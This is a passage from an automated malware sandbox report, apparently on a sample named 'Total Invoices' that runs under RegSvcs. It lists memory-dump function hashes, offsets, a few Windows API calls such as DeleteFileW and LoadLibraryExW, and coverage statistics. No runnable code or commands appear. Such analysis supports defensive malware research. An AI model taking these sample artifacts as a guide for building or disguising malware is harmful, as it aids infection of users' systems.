                                                                                        • Instruction ID: 26258f6d8c2d73a48ad45a1da9cf832650579a4434c286964f599502f2907a6c
                                                                                        • Opcode Fuzzy Hash: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
                                                                                        • Instruction Fuzzy Hash: 5311DF72504240DFDB02DF48D5C4B5ABFB1FB94324F24C2A9D9090F266C37AE45ACBA1
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1728960905.000000000158D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0158D000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_158d000_Total Invoices.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
                                                                                        • Instruction ID: b4672e7b361e63dba1cd1194bd003b62cffdda8655805f4a437c9705150d1598
                                                                                        • Opcode Fuzzy Hash: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
                                                                                        • Instruction Fuzzy Hash: BD11E172504280CFCB02DF54D5C4B1ABFB1FB84318F24C6AAD8090F656C33AD45ACBA1
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1729056724.000000000159D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0159D000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_159d000_Total Invoices.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
                                                                                        • Instruction ID: eaba8be20ddfaaebd46d1c18608070657f01d9fed6d966a8b3b35fa55c8f0ab0
                                                                                        • Opcode Fuzzy Hash: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
                                                                                        • Instruction Fuzzy Hash: B6118B75504280DFDF16CF54D5C4B19BFB1FB84224F28C6AAD8494F696C33AD44ACB62
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1728960905.000000000158D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0158D000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_158d000_Total Invoices.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: d1308299bf18f2db953c846278aeb37f89931ba158dfdd6044d10e5aa810d39a
                                                                                        • Instruction ID: 638eeef3968dc28f108b989c423b571f8b9305191f0eadb5e53b0355b2bb2eb9
                                                                                        • Opcode Fuzzy Hash: d1308299bf18f2db953c846278aeb37f89931ba158dfdd6044d10e5aa810d39a
                                                                                        • Instruction Fuzzy Hash: 2401FC7110438099E7107E69CD8475BBFECFF41324F08C929ED089E2C6C239D440C671
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1728960905.000000000158D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0158D000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_158d000_Total Invoices.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 07637522a674ba411f055639a630a5b5d1408fb31439cc44e53bb58a35df4097
                                                                                        • Instruction ID: 48cf5cffab5aa79c8af9428f01e2d7602cb6a303ddc8ecb0de737300be9f19cb
                                                                                        • Opcode Fuzzy Hash: 07637522a674ba411f055639a630a5b5d1408fb31439cc44e53bb58a35df4097
                                                                                        • Instruction Fuzzy Hash: A3F062715053849AE711AE1AC888B66FFE8FB81634F18C55AED485E286C2799844CBB1
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1737299283.0000000007AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AD0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ad0000_Total Invoices.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: T+-q$[V~*$]\`
                                                                                        • API String ID: 0-3978741314
                                                                                        • Opcode ID: 3a338567faefc41b46d7e59d71716cb8b3912c50c8a0beebdf3a3088777358f5
                                                                                        • Instruction ID: 9f0fa9957ff7ec61df085e451480194230a64a0d036adb7fb9b5445a313a296f
                                                                                        • Opcode Fuzzy Hash: 3a338567faefc41b46d7e59d71716cb8b3912c50c8a0beebdf3a3088777358f5
                                                                                        • Instruction Fuzzy Hash: F7B115B0E152599BCB04CFAAD9848DEFBF2FF89300F14D52AD826BB218D73099418F54
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1737299283.0000000007AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AD0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ad0000_Total Invoices.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: T+-q$[V~*$]\`
                                                                                        • API String ID: 0-3978741314
                                                                                        • Opcode ID: 54fdc5d5506752d8550ba49ba30aad1b442af824d6999d2457a6fee1c6340e23
                                                                                        • Instruction ID: 60c1826992a1fba1e5e1f4ef2140b0592655fafaa5a0fa908166ea2a3e6a842c
                                                                                        • Opcode Fuzzy Hash: 54fdc5d5506752d8550ba49ba30aad1b442af824d6999d2457a6fee1c6340e23
                                                                                        • Instruction Fuzzy Hash: 1981E8F4E15259DB8B04CFE9D9808DEFBB6FF99300F149516D826BB214D33099418F55
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1737299283.0000000007AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AD0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ad0000_Total Invoices.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: ~N<R
                                                                                        • API String ID: 0-641130846
                                                                                        • Opcode ID: b9cb5b37b9908b757d1c5c13b91806e2e5096fb487ef7f9ab19f7179e4bd1ade
                                                                                        • Instruction ID: e2e829bf123e5cbaf4de4804a6d616c0fad16cd14f3affc03cedaba7b1b90dab
                                                                                        • Opcode Fuzzy Hash: b9cb5b37b9908b757d1c5c13b91806e2e5096fb487ef7f9ab19f7179e4bd1ade
                                                                                        • Instruction Fuzzy Hash: 6CE1E9B4E101198FDB14DFA9C5809AEFBB2FF89304F248169E425AB356D734AD81CF61
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1737299283.0000000007AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AD0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ad0000_Total Invoices.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: ~N<R
                                                                                        • API String ID: 0-641130846
                                                                                        • Opcode ID: 315f245b699674c60aae5c455234933f7fcb7b305295a5309d0370d0ea1e2348
                                                                                        • Instruction ID: 6628390d316f64460d532977e53fc6b8065a5fa0f9866e6696fa4434fdb98346
                                                                                        • Opcode Fuzzy Hash: 315f245b699674c60aae5c455234933f7fcb7b305295a5309d0370d0ea1e2348
                                                                                        • Instruction Fuzzy Hash: 40511BB5E0021A8BDB14DFAAC9805AEBBF2BF89300F24C16AD419A7256D7349D41CF61
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1737299283.0000000007AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AD0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ad0000_Total Invoices.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 623464e9fc4391e2bd0d6e42419fbc6db4339c7855c57783ad6bd0b5061dc952
                                                                                        • Instruction ID: ce4f23b8caef1cad7c267c17b4feaf542410e2f486b58a46e053e64046b391e3
                                                                                        • Opcode Fuzzy Hash: 623464e9fc4391e2bd0d6e42419fbc6db4339c7855c57783ad6bd0b5061dc952
                                                                                        • Instruction Fuzzy Hash: 7AE10CB4E101198FDB14DFA9C5809AEFBB2FF89304F24815AE415AB355D731AD81CF61
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1737299283.0000000007AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AD0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ad0000_Total Invoices.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: b6006ce90e20012639dc17e272ffbc588dcad78a86cbeb11fa5e03d2938c45f7
                                                                                        • Instruction ID: babe1e4c8122d3c1ce35ff0fc98cf168a83fafeb164084e29cb5574a2313f811
                                                                                        • Opcode Fuzzy Hash: b6006ce90e20012639dc17e272ffbc588dcad78a86cbeb11fa5e03d2938c45f7
                                                                                        • Instruction Fuzzy Hash: 5EE10AB4E011198FDB14DFA9C5809AEFBB2FF89304F258169E415AB356D730AD81CFA1
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1737299283.0000000007AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AD0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ad0000_Total Invoices.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 6b2a3d6337c25d68a55945aed0f658637fb5523ec5c3f878f911fc2fd7594f58
                                                                                        • Instruction ID: b60c6a4183572e8810379deb1ecb3d199c04f3b2e7b94bcd74316560f2572e06
                                                                                        • Opcode Fuzzy Hash: 6b2a3d6337c25d68a55945aed0f658637fb5523ec5c3f878f911fc2fd7594f58
                                                                                        • Instruction Fuzzy Hash: FEE1F9B4E101198FDB14DFA9C5809AEFBB2FF89304F258169E415AB356DB30AD81CF60
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1737299283.0000000007AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AD0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ad0000_Total Invoices.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: d2a15e5bcfe6e2edb5c4baff3a1d2db57000dfd7707659603371688d6a783b67
                                                                                        • Instruction ID: a070cd78a71183661d6780205d47829dda403629083f6e4b703e40afb52d1fb4
                                                                                        • Opcode Fuzzy Hash: d2a15e5bcfe6e2edb5c4baff3a1d2db57000dfd7707659603371688d6a783b67
                                                                                        • Instruction Fuzzy Hash: 79E11DB4E101198FDB14DFA9C5809AEFBB2FF89314F248169E415AB356D731AD82CF60
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1737299283.0000000007AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AD0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ad0000_Total Invoices.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: f5b4ccef6d029d7e3851fee097b87deb11b1e7b5a7ff1208c893cf4fa35de22e
                                                                                        • Instruction ID: 9746cfd50786eda2d744882c9e829b171e56c1ca81f4aa43b290c2d8200a0ae4
                                                                                        • Opcode Fuzzy Hash: f5b4ccef6d029d7e3851fee097b87deb11b1e7b5a7ff1208c893cf4fa35de22e
                                                                                        • Instruction Fuzzy Hash: F1D1C63582075ACACB10EB65D994A9DB7B1FF95300F50D79AD0093B261EF70AAC9CF81
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1737299283.0000000007AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AD0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ad0000_Total Invoices.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 2618db1329c49bb65cc94610680e140de09492810d1d78e946f10b067f422073
                                                                                        • Instruction ID: 7448b6b4cc261fc1f7e7a14e9304c7ac56373de3667882d8e0d82f69973368c9
                                                                                        • Opcode Fuzzy Hash: 2618db1329c49bb65cc94610680e140de09492810d1d78e946f10b067f422073
                                                                                        • Instruction Fuzzy Hash: E2D1C63582075ACACB10EB65D994A9DB7B1FF95300F50D79AD0093B261EF70AAC9CF81
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1729310862.00000000015E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015E0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_15e0000_Total Invoices.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 0c6a600b3e5154184cc74c2594b7d92d6e3c17b96323f6b6ab339c54b6dc0e83
                                                                                        • Instruction ID: c50dca382209f2e9ea70fc15dc675e4198367d4dbedb3209bd49ddb7917856f0
                                                                                        • Opcode Fuzzy Hash: 0c6a600b3e5154184cc74c2594b7d92d6e3c17b96323f6b6ab339c54b6dc0e83
                                                                                        • Instruction Fuzzy Hash: 8EA13B36E0021A8FCF19DFB8D84499EBBF2BF85300B15856AE905AF265DF31E955CB40
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1737299283.0000000007AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AD0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ad0000_Total Invoices.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: b85b5731d323ecac4edd8bc545326b628a5f75e016d7fc4e4863c4cd6c3320a2
                                                                                        • Instruction ID: eb4750861b8ee66d08cb8b060e3e96b73dc2ba430e54163671c1c32c3bb1abb7
                                                                                        • Opcode Fuzzy Hash: b85b5731d323ecac4edd8bc545326b628a5f75e016d7fc4e4863c4cd6c3320a2
                                                                                        • Instruction Fuzzy Hash: AB511AB4E112198BDB14CFA9C9805AEBBB2FF89304F24C1AAD419A7355D7309D42CF61
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1737299283.0000000007AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AD0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ad0000_Total Invoices.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: bfa4e1d03f0e769bb8bcb0c79de194fed50a6f51406039f993d6d411a6fac707
                                                                                        • Instruction ID: 31a6add4881075bf00d32fe854bd7db3ec634b7adc943bcd7ffc2d1364ed6aeb
                                                                                        • Opcode Fuzzy Hash: bfa4e1d03f0e769bb8bcb0c79de194fed50a6f51406039f993d6d411a6fac707
                                                                                        • Instruction Fuzzy Hash: 17510BB4E012198FDB14DFA9C9805AEFBF2BF89314F248169D419A7256D7305D42CF61
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Execution Graph

                                                                                        Execution Coverage:11.2%
                                                                                        Dynamic/Decrypted Code Coverage:100%
                                                                                        Signature Coverage:0%
                                                                                        Total number of Nodes:173
                                                                                        Total number of Limit Nodes:17
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000008.00000002.1810467919.0000000006460000.00000040.00000800.00020000.00000000.sdmp, Offset: 06460000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_8_2_6460000_RegSvcs.jbxd
                                                                                        Similarity
                                                                                        • API ID: HandleModule
                                                                                        • String ID:
                                                                                        • API String ID: 4139908857-0
                                                                                        • Opcode ID: f37a6bf64cb782d595eb7857c380637659585cf9c061a018d15d8d80ef86ec30
                                                                                        • Instruction ID: 16df27def96a45ad429c814dc0e954e901b45807e913bc0b16dddd78e7f7b651
                                                                                        • Opcode Fuzzy Hash: f37a6bf64cb782d595eb7857c380637659585cf9c061a018d15d8d80ef86ec30
                                                                                        • Instruction Fuzzy Hash: 68810370A00B058FD7A5DF2AD44475BBBF6FF88204F10892EE49A97B50D774E885CB92
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 0646D022
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000008.00000002.1810467919.0000000006460000.00000040.00000800.00020000.00000000.sdmp, Offset: 06460000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_8_2_6460000_RegSvcs.jbxd
                                                                                        Similarity
                                                                                        • API ID: CreateWindow
                                                                                        • String ID:
                                                                                        • API String ID: 716092398-0
                                                                                        • Opcode ID: 869857c76f01b53f8ca3985d26ca5bd5ca86359d0ef46fa86462abff79d160bb
                                                                                        • Instruction ID: 78bb2746500945ebb9c6eb36d95373919b6b92cb1428b2f3efbb06f38902ecdd
                                                                                        • Opcode Fuzzy Hash: 869857c76f01b53f8ca3985d26ca5bd5ca86359d0ef46fa86462abff79d160bb
                                                                                        • Instruction Fuzzy Hash: DB51D171D00249AFDF15CFAAC884ADEBFB6BF49314F14816AE818AB221D7719845CF91
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Memory Dump Source
                                                                                        • Source File: 00000008.00000002.1810543923.0000000006470000.00000040.00000800.00020000.00000000.sdmp, Offset: 06470000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_8_2_6470000_RegSvcs.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 45a57c09972b2f933ea8247489ffb226cd812314520a602d4051948f593d42bb
                                                                                        • Instruction ID: 0fdd2a960224e2c64ed7c0d88a3da3b3b40ccbbf745ba141d3ae1c685504b982
                                                                                        • Opcode Fuzzy Hash: 45a57c09972b2f933ea8247489ffb226cd812314520a602d4051948f593d42bb
                                                                                        • Instruction Fuzzy Hash: 3C412571D143598FC704DFB9D8042EABFF5AF89310F1486ABD408A7291EB74A845CBE1
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 0646D022
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000008.00000002.1810467919.0000000006460000.00000040.00000800.00020000.00000000.sdmp, Offset: 06460000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_8_2_6460000_RegSvcs.jbxd
                                                                                        Similarity
                                                                                        • API ID: CreateWindow
                                                                                        • String ID:
                                                                                        • API String ID: 716092398-0
                                                                                        • Opcode ID: 51e82c8fe75f9ed6bc73545538486fe2a53469ae096c9ba2b16a209fc26897c2
                                                                                        • Instruction ID: f00f69d9bd78684f459db0cf36314de7757828ddc5da2adbb0dd62015d052f78
                                                                                        • Opcode Fuzzy Hash: 51e82c8fe75f9ed6bc73545538486fe2a53469ae096c9ba2b16a209fc26897c2
                                                                                        • Instruction Fuzzy Hash: A951B1B1D00349DFDB14CFAAC884ADEBFB5BF49314F24812AE819AB250D7719845CF91
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 0646D022
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000008.00000002.1810467919.0000000006460000.00000040.00000800.00020000.00000000.sdmp, Offset: 06460000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_8_2_6460000_RegSvcs.jbxd
                                                                                        Similarity
                                                                                        • API ID: CreateWindow
                                                                                        • String ID:
                                                                                        • API String ID: 716092398-0
                                                                                        • Opcode ID: e04dd462dcb66612eb545c983909b7ae774221acff3906be38fe6f941f7602d4
                                                                                        • Instruction ID: 73ada3d7875114f0fb227774bc7f260bef214ae4878413ddac8d4d983f49dc50
                                                                                        • Opcode Fuzzy Hash: e04dd462dcb66612eb545c983909b7ae774221acff3906be38fe6f941f7602d4
                                                                                        • Instruction Fuzzy Hash: 5641B0B1D00349DFDB14CFAAC884ADEBBB5FF48314F24812AE819AB250D7719845CF91
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        • CallWindowProcW.USER32(?,?,?,?,?), ref: 0646F711
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000008.00000002.1810467919.0000000006460000.00000040.00000800.00020000.00000000.sdmp, Offset: 06460000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_8_2_6460000_RegSvcs.jbxd
                                                                                        Similarity
                                                                                        • API ID: CallProcWindow
                                                                                        • String ID:
                                                                                        • API String ID: 2714655100-0
                                                                                        • Opcode ID: 4a1c66486ab7a4ad9b7603c4371fc4e5d804d3fa69e032f4f856f6c8e22e78fb
                                                                                        • Instruction ID: 617e88e3a877676bb79b56d0cac285236bd3cdd4c407b93827b9acdcaad1d923
                                                                                        • Opcode Fuzzy Hash: 4a1c66486ab7a4ad9b7603c4371fc4e5d804d3fa69e032f4f856f6c8e22e78fb
                                                                                        • Instruction Fuzzy Hash: B54149B4900205CFCB54DF9AC848AAABBF6FF88314F24C459E559AB321D774A845CFA1
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 06462ACF
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000008.00000002.1810467919.0000000006460000.00000040.00000800.00020000.00000000.sdmp, Offset: 06460000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_8_2_6460000_RegSvcs.jbxd
                                                                                        Similarity
                                                                                        • API ID: DuplicateHandle
                                                                                        • String ID:
                                                                                        • API String ID: 3793708945-0
                                                                                        • Opcode ID: 8cd063ad12ab1e8864507cb658a77e143a8f3b7d5a05c55a88c4e380373e64a8
                                                                                        • Instruction ID: d232f76b8a153eee9bf521bee7e1aed1aa3e230c164f6c5057eaf204d228c5f4
                                                                                        • Opcode Fuzzy Hash: 8cd063ad12ab1e8864507cb658a77e143a8f3b7d5a05c55a88c4e380373e64a8
                                                                                        • Instruction Fuzzy Hash: E121E4B5D00208AFDB10CFAAD984ADEFBF8EF48320F14841AE954A7310D374A950DFA5
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 06462ACF
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000008.00000002.1810467919.0000000006460000.00000040.00000800.00020000.00000000.sdmp, Offset: 06460000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_8_2_6460000_RegSvcs.jbxd
                                                                                        Similarity
                                                                                        • API ID: DuplicateHandle
                                                                                        • String ID:
                                                                                        • API String ID: 3793708945-0
                                                                                        • Opcode ID: 0fc392ce534ac76b69215413ddff17366120af427904951c1f5e557d0a3b6c34
                                                                                        • Instruction ID: 8fc1e6ed7d90c47b23bdca177e7a47da1c828afc0caab204414cbc7311440139
                                                                                        • Opcode Fuzzy Hash: 0fc392ce534ac76b69215413ddff17366120af427904951c1f5e557d0a3b6c34
                                                                                        • Instruction Fuzzy Hash: C721E4B5900208AFDB10CF9AD984ADEFBF4EB48310F14841AE954A7310D374A940DFA5
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        • DeleteFileW.KERNELBASE(00000000), ref: 016F73C8
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000008.00000002.1804513608.00000000016F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016F0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_8_2_16f0000_RegSvcs.jbxd
                                                                                        Similarity
                                                                                        • API ID: DeleteFile
                                                                                        • String ID:
                                                                                        • API String ID: 4033686569-0
                                                                                        • Opcode ID: aaa84a59b22c0d0da7674f49b07f8cd31c028ab06e0ab19cc68ec77f637d9961
                                                                                        • Instruction ID: 40d90b811aad6e52452c4c31116d4fb415b1a9ff1ec23d0e460c46b4dc954084
                                                                                        • Opcode Fuzzy Hash: aaa84a59b22c0d0da7674f49b07f8cd31c028ab06e0ab19cc68ec77f637d9961
                                                                                        • Instruction Fuzzy Hash: 392135B2C006699FCB10CF9AC845BEEFBB4EF48320F148169D918A7350D334A945CFA5
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        • LoadLibraryExW.KERNELBASE(00000000,?,?), ref: 0646B1EA
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000008.00000002.1810467919.0000000006460000.00000040.00000800.00020000.00000000.sdmp, Offset: 06460000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_8_2_6460000_RegSvcs.jbxd
                                                                                        Similarity
                                                                                        • API ID: LibraryLoad
                                                                                        • String ID:
                                                                                        • API String ID: 1029625771-0
                                                                                        • Opcode ID: 4ca2d2b1b7900fee21f64a46e2c936705592d320eb876885b0208bb43d2b592d
                                                                                        • Instruction ID: 582e3b077f735df7bdc448bcb9cd56b51bff8aa1a549d9a472319296113b88e1
                                                                                        • Opcode Fuzzy Hash: 4ca2d2b1b7900fee21f64a46e2c936705592d320eb876885b0208bb43d2b592d
                                                                                        • Instruction Fuzzy Hash: 7611D3B69002499FDB20CF9AD844ADFFFF8EB89710F10842AE419A7210C775A545CFA5
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        • DeleteFileW.KERNELBASE(00000000), ref: 016F73C8
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000008.00000002.1804513608.00000000016F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016F0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_8_2_16f0000_RegSvcs.jbxd
                                                                                        Similarity
                                                                                        • API ID: DeleteFile
                                                                                        • String ID:
                                                                                        • API String ID: 4033686569-0
                                                                                        • Opcode ID: d76d5ac6624c98b6ed872375763da7af415725958479dbe5003f8ed4d6b95dfa
                                                                                        • Instruction ID: 555a1837cecd5c1bdfc259c2f8761b1b06fe938be3e275035c94ac2e0a4dc6b6
                                                                                        • Opcode Fuzzy Hash: d76d5ac6624c98b6ed872375763da7af415725958479dbe5003f8ed4d6b95dfa
                                                                                        • Instruction Fuzzy Hash: 8A1136B2C006199BDB14CF9AD545BAEFBF4EF48320F10812AD918A7250D338A940CFA5
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        • LoadLibraryExW.KERNELBASE(00000000,?,?), ref: 0646B1EA
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000008.00000002.1810467919.0000000006460000.00000040.00000800.00020000.00000000.sdmp, Offset: 06460000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_8_2_6460000_RegSvcs.jbxd
                                                                                        Similarity
                                                                                        • API ID: LibraryLoad
                                                                                        • String ID:
                                                                                        • API String ID: 1029625771-0
                                                                                        • Opcode ID: 659e88146962114a26060508e1ee007a2e6915cae971f2b70bd5a8ba2ca4ede7
                                                                                        • Instruction ID: 6cd597cb7c76b0fe0c516fb1de3c7b0d09e624293a94ef6434810b28e56cdbd6
                                                                                        • Opcode Fuzzy Hash: 659e88146962114a26060508e1ee007a2e6915cae971f2b70bd5a8ba2ca4ede7
